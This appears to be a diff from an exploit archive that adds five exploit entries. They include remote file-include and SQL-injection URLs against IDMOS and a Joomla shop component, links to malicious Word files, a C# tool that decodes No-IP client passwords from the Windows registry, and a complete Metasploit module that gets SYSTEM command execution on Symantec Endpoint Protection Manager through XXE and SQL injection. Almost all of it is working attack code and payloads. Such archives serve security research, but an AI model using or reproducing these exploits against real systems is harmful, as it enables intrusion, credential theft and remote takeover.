platforms/php/webapps/31946.txt Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/29868/info
IDMOS is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues can allow an attacker to compromise the application and the underlying system; other attacks are also possible.
IDMOS 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/path/administrator/admin.php?site_absolute_path=[SHELL]
http://www.example.com/path/administrator/menu_operation.php?site_absolute_path=[SHELL]
http://www.example.com/path/administrator/template_add.php?site_absolute_path=[SHELL]
http://www.example.com/path/administrator/template_operation.php?site_absolute_path=[SHELL]

9
platforms/php/webapps/31947.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/29869/info
The EXP Shop component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
EXP Shop 1.0 is vulnerable; previous versions may also be affected.
http://www.example.com/index.php?option=com_expshop&page=show_payment&catid=-2 UNION SELECT @@version,@@version,concat(username,0x3a,password) FROM jos_users--

12
platforms/windows/dos/31934.txt Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/29769/info
Microsoft Word is prone to a remote memory-corruption vulnerability.
An attacker could exploit this issue by enticing a victim to open and interact with malicious Word files.
Successfully exploiting this issue will corrupt memory and crash the application. Given the nature of this issue, attackers may also be able to execute arbitrary code in the context of the currently logged-in user.
http://www.exploit-db.com/sploits/31934-1.doc
http://www.exploit-db.com/sploits/31934-2.doc
http://www.exploit-db.com/sploits/31934-3.doc
http://www.exploit-db.com/sploits/31934-4.doc

78
platforms/windows/local/31930.txt Executable file
View file

@ -0,0 +1,78 @@
source: http://www.securityfocus.com/bid/29758/info
The DUC application for No-IP is prone to a local information-disclosure vulnerability when it is running on Microsoft Windows.
Successfully exploiting this issue allows attackers to obtain potentially sensitive information that may aid in further attacks.
/*
* DUC NO-IP Local Password Information Disclosure
* Author(s): Charalambous Glafkos
* George Nicolaou
* Date: March 11, 2008
* Site: http://www.astalavista.com
* Mail: glafkos@astalavista.com
* ishtus@astalavista.com
*
* Synopsis: DUC NO-IP is prone to an information disclosure vulnerability due to a design error.
* Attackers can exploit this issue to obtain sensitive information including tray password,
* web username, password and hostnames that may lead to further attacks.
*
* Note: Vendor has been notified long time ago confirming a design error.
* Vendor site: http://www.no-ip.com
*
*/
using System;
using System.Text;
using System.IO;
using Microsoft.Win32;
namespace getRegistryValue
{
class getValue
{
static void Main()
{
getValue details = new getValue();
String strDUC = details.getDUC();
Console.WriteLine("\nDUC NO-IP Password Decoder v1.2");
Console.WriteLine("Author: Charalambous Glafkos");
Console.WriteLine("Bugs: glafkos@astalavista.com");
Console.WriteLine(strDUC);
FileInfo t = new FileInfo("no-ip.txt");
StreamWriter Tex = t.CreateText();
Tex.WriteLine(strDUC);
Tex.Write(Tex.NewLine);
Tex.Close();
Console.WriteLine("\nThe file named no-ip.txt is created\n");
}
private string getDUC()
{
RegistryKey ducKey = Registry.LocalMachine;
ducKey = ducKey.OpenSubKey(@"SOFTWARE\Vitalwerks\DUC", false);
String TrayPassword = DecodeBytes(ducKey.GetValue("TrayPassword").ToString());
String Username = ducKey.GetValue("Username").ToString();
String Password = DecodeBytes(ducKey.GetValue("Password").ToString());
String Hostnames = ducKey.GetValue("Hosts").ToString();
String strDUC = "\nTrayPassword: " + TrayPassword
+ "\nUsername: " + Username
+ "\nPassword: " + Password
+ "\nHostnames: " + Hostnames;
return strDUC;
}
public static string DecodeBytes(String encryptedData)
{
Byte[] toDecodeByte = Convert.FromBase64String(encryptedData);
System.Text.UTF8Encoding encoder = new System.Text.UTF8Encoding();
System.Text.Decoder utf8Decode = encoder.GetDecoder();
int charCount = utf8Decode.GetCharCount(toDecodeByte, 0, toDecodeByte.Length);
Char[] decodedChar = new char[charCount];
utf8Decode.GetChars(toDecodeByte, 0, toDecodeByte.Length, decodedChar, 0);
String result = new String(decodedChar);
return (new string(decodedChar));
}
}
}

123
platforms/windows/remote/31917.rb Executable file
View file

@ -0,0 +1,123 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/exploit/powershell'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include REXML
include Msf::Exploit::CmdStagerVBS
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Symantec Endpoint Protection Manager Remote Command Execution',
'Description' => %q{
This module exploits XXE and SQL injection flaws in Symantec Endpoint Protection Manager
versions 11.0, 12.0 and 12.1. When supplying a specially crafted XXE request an attacker
can reach SQL injection affected components. As xp_cmdshell is enabled in the included
database instance, it's possible to execute arbitrary system commands on the remote system
with SYSTEM privileges.
},
'Author' =>
[
'Stefan Viehbock', # Discovery
'Chris Graham', # PoC exploit
'xistence <xistence[at]0x90.nl>' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2013-5014' ],
[ 'CVE', '2013-5015' ],
[ 'EDB', '31853'],
[ 'URL', 'https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20140218-0_Symantec_Endpoint_Protection_Multiple_critical_vulnerabilities_wo_poc_v10.txt' ]
],
'Arch' => ARCH_X86,
'Platform' => 'win',
'Targets' =>
[
['Windows VBS Stager', {}]
],
'Privileged' => true,
'DisclosureDate' => 'Feb 24 2014',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(9090),
OptString.new('TARGETURI', [true, 'The base path', '/'])
], self.class)
end
def check
res = send_request_cgi(
{
'uri' => normalize_uri(target_uri.path),
'method' => 'GET',
})
if res && res.code == 200 && res.body =~ /Symantec Endpoint Protection Manager/ && res.body =~ /1995 - 2013 Symantec Corporation/
return Exploit::CheckCode::Appears
end
Exploit::CheckCode::Safe
end
def exploit
print_status("#{peer} - Sending payload")
# Execute the cmdstager, max length of the commands is ~3950
execute_cmdstager({:linemax => 3950})
end
def execute_command(cmd, opts = {})
# Convert the command data to hex, so we can use that in the xp_cmdshell. Else characters like '>' will be harder to bypass in the XML.
command = "0x#{Rex::Text.to_hex("cmd /c #{cmd}", '')}"
# Generate random 'xx032xxxx' sequence number.
seqnum = "#{rand_text_numeric(2)}032#{rand_text_numeric(4)}"
soap = soap_request(seqnum, command)
post_data = Rex::MIME::Message.new
post_data.add_part(soap, "text/xml", nil, "form-data; name=\"Content\"")
xxe = post_data.to_s
res = send_request_cgi(
{
'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),
'method' => 'POST',
'vars_get' => { 'ActionType' => 'ConsoleLog' },
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
'data' => xxe,
})
if res and res.body !~ /ResponseCode/
fail_with(Failure::Unknown, "#{peer} - Something went wrong.")
end
end
def soap_request(seqnum, command)
randpayload = rand_text_alpha(8+rand(8))
randxxe = rand_text_alpha(8+rand(8))
entity = "<!ENTITY #{randpayload} SYSTEM \"http://127.0.0.1:9090/servlet/ConsoleServlet?"
entity << "ActionType=ConfigServer&action=test_av&SequenceNum=#{seqnum}&Parameter=';call xp_cmdshell(#{command});--\" >"
xml = Document.new
xml.add(DocType.new('sepm', "[ METASPLOIT ]"))
xml.add_element("Request")
xxe = xml.root.add_element(randxxe)
xxe.text = "PAYLOAD"
xml_s = xml.to_s
xml_s.gsub!(/METASPLOIT/, entity) # To avoid html encoding
xml_s.gsub!(/PAYLOAD/, "&#{randpayload};") # To avoid html encoding
xml_s
end
end